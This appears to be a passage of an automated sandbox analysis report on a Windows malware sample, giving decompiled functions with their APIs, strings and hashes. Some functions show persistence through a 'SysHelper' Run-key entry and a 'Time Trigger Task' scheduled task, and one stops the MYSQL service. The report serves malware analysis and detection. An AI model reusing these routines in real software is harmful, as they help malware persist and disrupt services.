API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00412360() {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v2066;
				short _v2068;
				short _v4116;
				signed int _t35;

				E0042F7C0(0x1010);
				_v8 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
					_v12 = 1;
					_v2068 = 0;
					E0042B420( &_v2066, 0, 0x7fe);
					_v20 = 0x400;
					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
					RegCloseKey(_v8);
					_v16 = 0;
					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
					_t35 = lstrcmpW( &_v4116,  &_v2068);
					asm("sbb eax, eax");
					return  ~_t35 + 1;
				} else {
					return 0;
				}
			}

0x00412368
0x00412370
0x00412391
0x0041239b
0x004123a8
0x004123b6
0x004123be
0x004123de
0x004123e7
0x004123ed
0x0041240e
0x00412422
0x0041242a
0x00412430
0x00412393
0x00412398
0x00412398

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32 ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
SysHelper, xrefs: 004123D6

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t99;
				signed int _t102;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr _t124;
				intOrPtr* _t136;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t183;
				intOrPtr _t185;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				intOrPtr* _t213;
				intOrPtr* _t219;
				void* _t226;

				_push(__ecx);
				_t219 = __ecx;
				_t213 = _a4;
				_t188 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t188 < _t213) {
					L102:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *_t188;
				} else {
					_t183 = _a16;
					_t99 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t99 < _t183) {
						goto L102;
					} else {
						_t188 = _t188 - _t213;
						_t207 =  <  ? _t188 : _a8;
						_a8 = _t207;
						_t185 =  <  ? _t99 - _t183 : _a20;
						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
						_v8 = _t102;
						if((_t102 | 0xffffffff) - _t185 <= _v8) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L102;
						} else {
							_t189 = _t188 - _t207;
							_t107 = _v8 + _t185;
							_a20 = _t189;
							_v8 = _t107;
							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
								_push(0);
								E00415810(_t185, __ecx, _t213, _t107);
								_t189 = _a20;
								_t207 = _a8;
							}
							_t108 = _a12;
							if(_t219 == _t108) {
								__eflags = _t185 - _t207;
								if(_t185 > _t207) {
									__eflags = _a16 - _t213;
									if(_a16 > _t213) {
										__eflags = _t213 + _t207 - _a16;
										_t110 =  *((intOrPtr*)(_t219 + 0x14));
										if(_t213 + _t207 > _a16) {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_t190 = _t219;
											} else {
												_t190 =  *_t219;
											}
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _a12 + _a16;
												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t111 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_t191 = _t219;
											} else {
												_t191 =  *_t219;
											}
											_t112 = _a20;
											__eflags = _t112;
											if(_t112 != 0) {
												__eflags = _t191 + _t213 + _t185;
												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
												_t226 = _t226 + 0xc;
											}
											_t113 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_t208 = _t219;
											} else {
												_t208 =  *_t219;
											}
											_t192 = _a8;
											_t115 = _t185 - _t192;
											__eflags = _t115;
											if(_t115 != 0) {
												_push(_t115);
												_push(_a12 + _a16 + _t185);
												_t124 = _t213 + _t208 + _t192;
												__eflags = _t124;
												goto L96;
											}
										} else {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a4 = _t219;
											} else {
												_a4 =  *_t219;
												_t207 = _a8;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t189;
											if(_t189 != 0) {
												__eflags = _a12 + _t213 + _t185;
												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t197 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t136 = _t219;
											} else {
												_t136 =  *_t219;
											}
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t198 = _t219;
											} else {
												_t198 =  *_t219;
											}
											__eflags = _t185;
											if(_t185 != 0) {
												_push(_t185);
												_push(_t136 - _t207 + _a16 + _t185);
												_t124 = _t198 + _t213;
												goto L96;
											}
										}
									} else {
										_t148 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a4 = _t219;
										} else {
											_a4 =  *_t219;
											_t207 = _a8;
										}
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a8 = _t219;
										} else {
											_a8 =  *_t219;
										}
										__eflags = _t189;
										if(_t189 != 0) {
											__eflags = _a8 + _t213 + _t185;
											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
											_t226 = _t226 + 0xc;
										}
										_t149 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t210 = _t219;
										} else {
											_t210 =  *_t219;
										}
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t199 = _t219;
										} else {
											_t199 =  *_t219;
										}
										__eflags = _t185;
										if(_t185 != 0) {
											_push(_t185);
											_push(_a16 + _t210);
											_t124 = _t199 + _t213;
											goto L96;
										}
									}
								} else {
									_t160 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_a4 = _t219;
									} else {
										_a4 =  *_t219;
									}
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_t200 = _t219;
									} else {
										_t200 =  *_t219;
									}
									__eflags = _t185;
									if(_t185 != 0) {
										__eflags = _a4 + _a16;
										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
										_t207 = _a8;
										_t226 = _t226 + 0xc;
									}
									_t161 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_a8 = _t219;
									} else {
										_a8 =  *_t219;
									}
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_t201 = _t219;
									} else {
										_t201 =  *_t219;
									}
									_t162 = _a20;
									__eflags = _t162;
									if(_t162 != 0) {
										_push(_t162);
										_push(_a8 + _t213 + _t207);
										_t124 = _t201 + _t213 + _t185;
										L96:
										_push(_t124);
										E004205A0();
										goto L97;
									}
								}
							} else {
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a8 = _t219;
								} else {
									_a8 =  *_t219;
									_t213 = _a4;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a20 = _t219;
								} else {
									_a20 =  *_t219;
									_t213 = _a4;
								}
								if(_t189 != 0) {
									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
									_t108 = _a12;
									_t226 = _t226 + 0xc;
								}
								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
									_t108 =  *_t108;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_t204 = _t219;
								} else {
									_t204 =  *_t219;
								}
								if(_t185 != 0) {
									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
									L97:
								}
							}
							_t193 = _v8;
							 *(_t219 + 0x10) = _t193;
							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
								_t116 = _t219;
								 *((char*)(_t116 + _t193)) = 0;
								return _t116;
							} else {
								 *((char*)( *_t219 + _t193)) = 0;
								return _t219;
							}
						}
					}
				}
			}

0x00418003
0x00418005
0x00418008
0x0041800b
0x00418010
0x00418342
0x00418342
0x00418347
0x0041834c
0x0041834d
0x0041834e
0x0041834f
0x00418352
0x00418016
0x0041801a
0x0041801d
0x00418022
0x00000000
0x00418028
0x0041802b
0x0041802f
0x00418039
0x0041803c
0x00418042
0x00418044
0x0041804f
0x00418338
0x0041833d
0x00000000
0x00418055
0x00418058
0x0041805a
0x0041805c
0x0041805f
0x00418065
0x00418067
0x0041806c
0x00418071
0x00418074
0x00418074
0x00418077
0x0041807c
0x004180f3
0x004180f5
0x0041816a
0x0041816d
0x004181e3
0x004181e6
0x004181e9
0x0041825e
0x00418261
0x0041826a
0x00418263
0x00418265
0x00418265
0x0041826d
0x00418270
0x00418276
0x00418272
0x00418272
0x00418272
0x00418278
0x0041827a
0x0041827f
0x00418288
0x0041828d
0x00418290
0x00418290
0x00418293
0x00418296
0x00418299
0x004182a2
0x0041829b
0x0041829d
0x0041829d
0x004182a5
0x004182a8
0x004182ae
0x004182aa
0x004182aa
0x004182aa
0x004182b0
0x004182b3
0x004182b5
0x004182c3
0x004182c6
0x004182cb
0x004182cb
0x004182ce
0x004182d1
0x004182d4
0x004182dd
0x004182d6
0x004182d8
0x004182d8
0x004182e0
0x004182e3
0x004182e9
0x004182e5
0x004182e5
0x004182e5
0x004182eb
0x004182f0
0x004182f0
0x004182f2
0x004182f4
0x004182fd
0x00418302
0x00418302
0x00000000
0x00418302
0x004181eb
0x004181eb
0x004181ee
0x004181fa
0x004181f0
0x004181f2
0x004181f5
0x004181f5
0x004181fd
0x00418200
0x00418209
0x00418202
0x00418204
0x00418204
0x0041820c
0x0041820e
0x0041821e
0x00418221
0x00418226
0x00418229
0x00418229
0x0041822c
0x0041822f
0x00418232
0x00418238
0x00418234
0x00418234
0x00418234
0x0041823a
0x0041823d
0x00418243
0x0041823f
0x0041823f
0x0041823f
0x00418245
0x00418247
0x00418254
0x00418255
0x00418256
0x00000000
0x00418256
0x00418247
0x0041816f
0x0041816f
0x00418172
0x00418175
0x00418181
0x00418177
0x00418179
0x0041817c
0x0041817c
0x00418184
0x00418187
0x00418190
0x00418189
0x0041818b
0x0041818b
0x00418193
0x00418195
0x004181a5
0x004181a8
0x004181ad
0x004181ad
0x004181b0
0x004181b3
0x004181b6
0x004181bc
0x004181b8
0x004181b8
0x004181b8
0x004181be
0x004181c1
0x004181c7
0x004181c3
0x004181c3
0x004181c3
0x004181c9
0x004181cb
0x004181d6
0x004181d7
0x004181d8
0x00000000
0x004181d8
0x004181cb
0x004180f7
0x004180f7
0x004180fa
0x004180fd
0x00418106
0x004180ff
0x00418101
0x00418101
0x00418109
0x0041810c
0x00418112
0x0041810e
0x0041810e
0x0041810e
0x00418114
0x00418116
0x0041811b
0x00418124
0x00418129
0x0041812c
0x0041812c
0x0041812f
0x00418132
0x00418135
0x0041813e
0x00418137
0x00418139
0x00418139
0x00418141
0x00418144
0x0041814a
0x00418146
0x00418146
0x00418146
0x0041814c
0x0041814f
0x00418151
0x00418157
0x0041815f
0x00418163
0x00418304
0x00418304
0x00418305
0x00000000
0x00418305
0x00418151
0x0041807e
0x00418082
0x0041808e
0x00418084
0x00418086
0x00418089
0x00418089
0x00418095
0x004180a1
0x00418097
0x00418099
0x0041809c
0x0041809c
0x004180a6
0x004180b9
0x004180be
0x004180c1
0x004180c1
0x004180c8
0x004180ca
0x004180ca
0x004180d0
0x004180d6
0x004180d2
0x004180d2
0x004180d2
0x004180da
0x004180e9
0x0041830a
0x0041830a
0x004180da
0x00418311
0x00418314
0x00418318
0x0041832a
0x0041832e
0x00418335
0x0041831a
0x0041831d
0x00418327
0x00418327
0x00418318
0x0041804f
0x00418022

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160
comstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DAC0(char _a4, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				intOrPtr _v76;
				short _v84;
				intOrPtr _v88;
				char _v92;
				short _v20572;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t129;

				 *[fs:0x0] = _t129;
				_t61 = E0042F7C0(0x504c);
				_v8 = 0;
				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
				if(_t61 >= 0) {
					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
					_t63 = _v24;
					_push( &_v20);
					_push(0x4d4f8c);
					_push(0x4d4f9c);
					_push(L"Time Trigger Task");
					_push(_t63);
					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
						_t98 = _v24;
						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
						_t100 = _v24;
						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
					}
					_t65 = _v20;
					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
					_t67 = _v36;
					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
					_t69 = _v20;
					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
					_t71 = _v20;
					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
					_t73 = _v20;
					_t122 =  >=  ? _a4 :  &_a4;
					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
					_t75 = _v20;
					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
					_t78 =  >=  ? _a4 :  &_a4;
					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
					PathRemoveFileSpecW( &_v20572);
					_t83 = _v20;
					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
					_t85 = _v20;
					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
					_t87 = _v20;
					_v28 = 0;
					_v32 = 0;
					_v40 = 0;
					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
					E0042B420( &_v92, 0, 0x30);
					_v88 = 0xb07e2;
					_v92 = 0x30;
					_t129 = _t129 + 0xc;
					_v84 = 1;
					_t93 = _v28;
					_v76 = 0x21000c;
					_v60 = 0;
					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
					_t95 = _v20;
					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
					_t97 = _v32;
					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
					__imp__CoUninitialize();
				}
				if(_a24 >= 8) {
					_t61 = L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t61;
			}

0x0040dad6
0x0040dadd
0x0040dae4
0x0040daeb
0x0040daf3
0x0040db0b
0x0040db11
0x0040db17
0x0040db18
0x0040db1d
0x0040db24
0x0040db29
0x0040db2f
0x0040db31
0x0040db3c
0x0040db3f
0x0040db58
0x0040db58
0x0040db5b
0x0040db6a
0x0040db6c
0x0040db76
0x0040db79
0x0040db88
0x0040db8a
0x0040db97
0x0040db9a
0x0040dba4
0x0040dbac
0x0040dbb2
0x0040dbbd
0x0040dbca
0x0040dbd6
0x0040dbe3
0x0040dbe9
0x0040dbf6
0x0040dbfc
0x0040dc07
0x0040dc0a
0x0040dc11
0x0040dc1b
0x0040dc22
0x0040dc2d
0x0040dc38
0x0040dc42
0x0040dc49
0x0040dc4d
0x0040dc55
0x0040dc5c
0x0040dc5f
0x0040dc66
0x0040dc71
0x0040dc74
0x0040dc83
0x0040dc85
0x0040dc8f
0x0040dc92
0x0040dc92
0x0040dc9c
0x0040dca1
0x0040dca6
0x0040dcac
0x0040dcb6

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32 ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
--Task, xrefs: 0040DBB5
Comment, xrefs: 0040DBFF

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: e319be2d829e19d2b37083f58621ed3e6e1b196228c1693d1d3392fa3d1c8cc5
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: e319be2d829e19d2b37083f58621ed3e6e1b196228c1693d1d3392fa3d1c8cc5
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411A10() {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t9;
				int _t10;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t23;
				void* _t26;

				_t9 = OpenSCManagerW(0, 0, 1);
				_t19 = _t9;
				if(_t19 != 0) {
					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
					_t26 = _t10;
					if(_t26 == 0) {
						L12:
						return _t10;
					}
					if(ControlService(_t26, 1,  &_v32) == 0) {
						L11:
						_t10 = CloseServiceHandle(_t19);
						goto L12;
					}
					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
						L10:
						CloseServiceHandle(_t26);
						goto L11;
					} else {
						_t16 = _v12;
						do {
							_t23 = _t16;
							Sleep(_v8);
							if(QueryServiceStatus(_t26,  &_v32) == 0) {
								break;
							}
							_t16 = _v12;
						} while (_t16 >= _t23 && _v28 != 1);
						goto L10;
					}
				}
				return _t9;
			}

0x00411a1d
0x00411a23
0x00411a27
0x00411a32
0x00411a38
0x00411a3c
0x00411aa4
0x00000000
0x00411aa4
0x00411a54
0x00411aa0
0x00411aa1
0x00000000
0x00411aa3
0x00411a63
0x00411a9d
0x00411a9e
0x00000000
0x00411a6b
0x00411a6b
0x00411a70
0x00411a73
0x00411a75
0x00411a88
0x00000000
0x00000000
0x00411a8a
0x00411a8d
0x00000000
0x00411a97
0x00411a63
0x00411aa9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0044F26C(void* __eflags, char _a4) {
				char _v16;
				char _v24;
				char _v44;
				intOrPtr _v52;
				char _v76;
				char _v84;
				char _v104;
				void* _t50;
				void* _t51;

				_t51 = _t50 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6560;
				E00430ECA( &_v16, 0x508238);
				asm("int3");
				_push(_t50);
				E00430CFC( &_v44,  &_v24);
				_v44 = 0x4d6578;
				E00430ECA( &_v44, 0x508274);
				asm("int3");
				_push(_t51);
				E0044EF74( &_v76, _v52);
				E00430ECA( &_v76, 0x508320);
				asm("int3");
				_push(_t51 - 0xc);
				E00430CFC( &_v104,  &_v84);
				_v104 = 0x4d656c;
				E00430ECA( &_v104, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
